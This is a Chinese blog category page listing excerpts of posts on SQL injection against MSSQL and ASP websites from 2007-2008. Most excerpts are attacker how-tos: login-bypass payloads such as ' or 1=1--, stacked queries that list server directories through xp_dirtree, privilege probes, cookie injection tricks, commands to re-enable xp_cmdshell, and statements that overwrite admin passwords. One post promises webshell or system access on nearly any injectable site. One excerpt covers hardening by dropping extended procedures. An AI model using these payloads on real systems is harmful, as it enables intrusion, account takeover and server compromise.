您正在查看 "注入漏洞文章" 分类下的文章
2008-05-07 17:22
使用系统帐户登陆查询分析器,删除扩展方法:
运行以下脚本
use master
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_dropextendedproc 'xp_dirtree'
exec sp_dropextendedproc 'xp_enumgroups'
exec sp_dropextendedproc 'xp_fixeddrives'
exec sp_dropextendedproc 'xp_loginconfig'
exec sp_dropextendedproc 'xp_enumerrorlogs'
exec sp_dropextendedproc 'xp_getfiledetails'
exec sp_dropextendedproc 'Sp_OACreate'
exec sp_dropextendedproc 'Sp_OADestroy' |
2008-01-31 12:46
适用于SQL直接列出数据库名表名的命令
select * from master.dbo.sysdatabases 查找所有的库
select 列名 from 表名 列出列的记录
select password from 库名.dbo.表名 where name='admin' 列下name列值为admin对应的password列的值
update 库名.dbo.表名 set 列名(如password)='09ddf7a2dbc6f17f' where 列名(如name)='admin'; 把admin的密码改为killhk
update master.dbo.sysxlogins set password=0x010 |
2008-01-29 16:27
1、使用xp_dirtree列目录
;create table dirs(paths varchar(1000))-- 建dirs表,列名为paths,1000字节。
;insert dirs exec master.dbo.xp_dirtree 'c:\';-- 用xp_dirtree存储过程列C盘目录。
and 0<>(select top 1 paths from dirs where id=1);-- 暴出phths第一级目录
and 0<>(select top 1 paths from dirs);-- 暴出paths列的值,也就是所有目录名称。
and 0<>(select top 1 paths fro |
2008-01-21 10:39
SQL语句有很多,存储过程多得不得了,现列出常规的思路,当然这是在注入点注入的,所以有些限制。
先解释一下,分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释
1、拿到注入点后,我们可以先测试一下权限,看他到底有什么权限
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- sa权限
and 1=(SELECT IS_MEMBER('db_owner'));-- db_owner权限
and 1=(select IS_MEMBER('public'));-- |
2008-01-19 23:13
http://xxxx/view.asp?id=1
先访问http://xxxx/view.asp?id=1
接着在浏览器里输入:
javascript:alert(document.cookie="id="+escape("1 and 1=1"))
再访问http://xxxx/view.asp(未出错)
再输入:javascript:alert(document.cookie="id="+escape("188 and 1=2"))
再访问:http://xxxx/view.asp(出错)
该页面出错就表示可以用Cookie注入。
现在很多网站都加了防注入系统代码,你输入注入语句将无法注入~~感觉这样的防注入系统不错,但防 |
2008-01-19 22:28
sql server 2005下开启xp_cmdshell的办法
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
SQL2005开启'OPENROWSET'支持的方法:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGU |
2008-01-16 16:58
1、常规的注入
如果你以前没试过sql注入的话,那么第一步先把IE菜单=>工具=>Internet选项= >高级=>显示友好 HTTP 错误信息前面的勾去掉。否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。
2.1、判断SQL是否可以注入
在后面加 ' 如果页面返回正常,则不可注入或过滤掉了,如果出现出错页面,则判断可以注入。
and 1=1 这句返回正常页面
and 1=2 如果页面返回正常,则不可注入,如果出现出错页面,则判断可以注入。
2.2、判断数据库类型
如果 |
2008-01-16 16:54
首先接解到的注入就是'or'='or'
可是有时候用这种方法进不了后台,其实我们还有很多种方法可以试试的如
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
'or'='or'
|
2008-01-10 14:57
我看到MSSQL的存储过程中,有模有样的在过滤。 然后我就去读读他们的存储过程。就找到了一个注入而已。
疯子如是说。
漏洞资料如下:
master..sp_resolve_logins存储过程中,对@dest_path参数过滤不严,导致xp_cmdshell注入。
分析:
Select @dest_path = RTRIM(LTRIM(@dest_path))
-- If the last char is '\', remove it.
IF substring(@dest_path, len(@dest_path),1) = '\'
Select @dest_path = substring(@dest_path, 1, len(@dest_path)-1) |
2007-12-19 12:59
声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为 发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作。
考虑再三,偶还是决定发出来。此招手段歹毒,利用范围广泛,可以说是只要是有sql注射漏洞的网站,只要运用此法99%可以拿到webshell甚至系统权限(不敢
把话说满,呵呵,经本人数百次真实“实战演习”,基本上是100%可以拿到webshell甚至系统权限)。
记得我在《MSSQL db_owner角 |
|
| 
